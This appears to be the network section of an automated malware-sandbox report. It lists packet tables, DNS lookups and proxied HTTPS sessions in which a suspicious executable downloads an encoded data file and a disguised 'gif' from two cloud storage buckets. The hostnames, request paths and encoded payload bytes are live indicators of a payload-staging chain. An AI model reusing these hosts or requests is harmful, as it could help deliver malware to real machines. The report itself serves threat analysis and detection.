Jan 13, 2025 02:06:45.705051899 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.705095053 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.705121040 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.705147982 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.705208063 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.705208063 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.705230951 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.705276966 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.705319881 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.705319881 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.705334902 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.705384970 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.705411911 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:45.911326885 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:45.911376953 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.084763050 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.084801912 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.084836006 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.084845066 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.084933996 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.139036894 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.139054060 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139105082 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139113903 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139363050 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.139372110 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139398098 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139456987 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139467955 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139476061 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.139481068 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139552116 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.139559031 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.139599085 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.139656067 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.347326040 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.347418070 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.783410072 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.783504963 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.917902946 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.917941093 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.917958021 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.918009043 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.918016911 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.918026924 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.918045998 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.918119907 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.918119907 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:46.918159962 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:46.918212891 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:47.040015936 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:47.040049076 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:47.040070057 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:47.040080070 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:47.040169001 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:47.040178061 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:47.040206909 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:47.040210962 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:47.040225983 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:47.040232897 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:47.040333986 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:47.428915977 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:47.483273029 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:48.229223967 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:48.229312897 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:48.475600958 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:48.475646973 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:48.475732088 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:48.475950003 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:48.475960970 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:49.721730947 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:49.721947908 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:49.729006052 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:49.729041100 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:49.729201078 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:49.729213953 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.066458941 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.066503048 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.066560030 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.066589117 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.066610098 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.066611052 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.066638947 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.066646099 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.066667080 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.066693068 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.067071915 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.067138910 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.068062067 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.068159103 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.152354956 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.152393103 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.152422905 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.152435064 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.152462959 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.152487993 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.152712107 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.152762890 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.152769089 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.152806044 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.152811050 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.152849913 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.153048038 CET	49991	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.153062105 CET	443	49991	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.166620016 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.166654110 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:50.166738033 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.166935921 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:50.166945934 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.436008930 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.436198950 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.436943054 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.436953068 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.437120914 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.437129974 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.784142971 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.784169912 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.784364939 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.784380913 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.784498930 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.784709930 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.784763098 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.784780979 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.784823895 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.784890890 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.784935951 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.784955978 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:51.785001993 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.785515070 CET	49992	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:51.785528898 CET	443	49992	47.101.28.195	192.168.2.6
Jan 13, 2025 02:07:05.307646036 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:05.307698965 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:05.307758093 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:05.319341898 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:05.319364071 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:06.621877909 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:06.621979952 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:06.622544050 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:06.622680902 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:06.689467907 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:06.689492941 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:06.689786911 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:06.689841986 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:06.692624092 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:06.735346079 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.045335054 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.045357943 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.045452118 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.045468092 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.045911074 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.046077967 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.046204090 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.047339916 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.047398090 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.051940918 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.052048922 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.131720066 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.131797075 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.131802082 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.131840944 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.131855011 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.131874084 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.131896973 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.131903887 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.131918907 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.131942987 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.132709026 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.132848978 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.133445978 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.133512020 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.133517981 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.133538961 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:07.133554935 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.133611917 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.133611917 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.442810059 CET	49993	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:07.442831993 CET	443	49993	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:08.445683956 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:08.445723057 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:08.445903063 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:08.446125984 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:08.446140051 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:09.686435938 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:09.686623096 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:09.687139034 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:09.687149048 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:09.687366009 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:09.687372923 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:10.013350010 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:10.013432026 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:10.013474941 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:10.013501883 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:10.014403105 CET	49994	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:10.014416933 CET	443	49994	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:10.026431084 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:10.026442051 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:10.026523113 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:10.026701927 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:10.026712894 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.257451057 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.257519960 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.258091927 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.258100986 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.258260965 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.258279085 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.619716883 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.619744062 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.619874954 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.619904995 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.620121002 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.620182991 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.620192051 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.620227098 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.621376038 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.621443987 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.625355959 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.625427008 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.706290960 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.706338882 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.706423998 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.706442118 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.706460953 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.706480980 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.706991911 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.707047939 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.707775116 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.707829952 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.708161116 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.708210945 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.709007978 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.709201097 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.710102081 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.710165977 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.710180998 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.710186958 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.710223913 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.710241079 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.712222099 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.712284088 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.712372065 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.712410927 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.712419033 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.712444067 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.712451935 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.712480068 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.712723017 CET	49995	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.712739944 CET	443	49995	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.734786987 CET	49996	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.734832048 CET	443	49996	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:11.734920979 CET	49996	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.735163927 CET	49996	443	192.168.2.6	118.178.60.9
Jan 13, 2025 02:07:11.735177040 CET	443	49996	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:13.069272041 CET	443	49996	118.178.60.9	192.168.2.6
Jan 13, 2025 02:07:13.069331884 CET	49996	443	192.168.2.6	118.178.60.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 02:06:31.671909094 CET	64710	53	192.168.2.6	1.1.1.1
Jan 13, 2025 02:06:32.003679037 CET	53	64710	1.1.1.1	192.168.2.6
Jan 13, 2025 02:07:04.986664057 CET	58706	53	192.168.2.6	1.1.1.1
Jan 13, 2025 02:07:05.301177979 CET	53	58706	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 02:06:31.671909094 CET	192.168.2.6	1.1.1.1	0x51cd	Standard query (0)	hdsuer.oss-cn-shanghai.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 02:07:04.986664057 CET	192.168.2.6	1.1.1.1	0x5a9b	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 02:06:32.003679037 CET	1.1.1.1	192.168.2.6	0x51cd	No error (0)	hdsuer.oss-cn-shanghai.aliyuncs.com	sc-2jmu.cn-shanghai.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 02:06:32.003679037 CET	1.1.1.1	192.168.2.6	0x51cd	No error (0)	sc-2jmu.cn-shanghai.oss-adns.aliyuncs.com	sc-2jmu.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 02:06:32.003679037 CET	1.1.1.1	192.168.2.6	0x51cd	No error (0)	sc-2jmu.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com		47.101.28.195	A (IP address)	IN (0x0001)	false
Jan 13, 2025 02:07:05.301177979 CET	1.1.1.1	192.168.2.6	0x5a9b	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 02:07:05.301177979 CET	1.1.1.1	192.168.2.6	0x5a9b	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 02:07:05.301177979 CET	1.1.1.1	192.168.2.6	0x5a9b	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

hdsuer.oss-cn-shanghai.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49985	47.101.28.195	443	3548	C:\Users\user\Desktop\13478674376-78423498.01.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:06:33 UTC	107	OUT	GET /i.dat HTTP/1.1 User-Agent: 3M Host: hdsuer.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:06:33 UTC	557	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:06:33 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 67846719C3CC073236BF405B Accept-Ranges: bytes ETag: "16F89B052013F0DFDDA27882DC5CFB09" Last-Modified: Sun, 12 Jan 2025 11:36:01 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8061532556984529501 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: FvibBSAT8N/doniC3Fz7CQ== x-oss-server-time: 2
2025-01-13 01:06:33 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 58 54 43 45 20 37 6b 2a 59 59 07 49 27 64 3a 21 40 4f 46 49 28 20 67 28 44 41 51 5d 33 3e 2e 73 10 1c 1e 5c 3d 72 3b 35 53 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 5d 41 41 45 36 7f 6a 6a 02 0e 19 1f 7a 6d 31 70 03 03 5d 13 7d 3e 60 7b 1a 15 1c 13 72 7a 3d 72 1e 1b 0b 07 69 64 74 29 4a 46 44 06 64 28 61 6f 09 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 07 1b 1b 1f 6c 25 30 30 58 54 43 45 20 37 6b 2a 59 59 07 49 27 64 3a 21 40 4f 46 49 28 20 67 28 44 41 51 5d 33 3e 2e 73 10 1c 1e 5c 3f 72 3b 35 53 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 5d 41 41 45 36 7f 6a 6a 02 0e 19 1f 7a 6d 31 Data Ascii: l%00XTCE 7kYYI'd:!@OFI( g(DAQ]3>.s\=r;5S5555555555555555555555555555555]AAE6jjzm1p]}>`{rz=ridt)JFDd(aooooooooooooooooooooooooooooooool%00XTCE 7kYYI'd:!@OFI( g(DAQ]3>.s\?r;5S5555555555555555555555555555555]AAE6jjzm1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49986	47.101.28.195	443	3548	C:\Users\user\Desktop\13478674376-78423498.01.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:06:35 UTC	107	OUT	GET /a.gif HTTP/1.1 User-Agent: 3M Host: hdsuer.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:06:35 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:06:35 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 6784671B5C5A723838344BD2 Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Sun, 12 Jan 2025 11:34:49 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 2
